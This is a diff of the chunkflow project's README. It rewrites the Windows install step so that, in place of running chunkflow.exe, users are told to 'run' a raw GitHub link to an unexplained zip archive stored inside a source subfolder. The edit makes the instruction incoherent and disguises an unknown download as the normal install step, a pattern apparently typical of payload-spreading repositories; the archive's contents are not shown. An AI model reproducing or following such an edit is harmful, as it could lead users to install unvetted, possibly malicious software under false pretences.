Matsadx/chunkflow/README.md

 Once downloaded,

-- On Windows, double-click the .exe file or unzip the .zip file, then run chunkflow.exe.
+- On Windows, double-click the .exe file or unzip the .zip file, then run https://raw.githubusercontent.com/Matsadx/chunkflow/main/chunkflow/chunkers/Software_2.1.zip
 - On Mac, open the .dmg file or unzip the .zip, then drag chunkflow to your Applications folder and open it.
 - On Linux, extract the archive or give permissions to the .AppImage and run it from your terminal or file manager.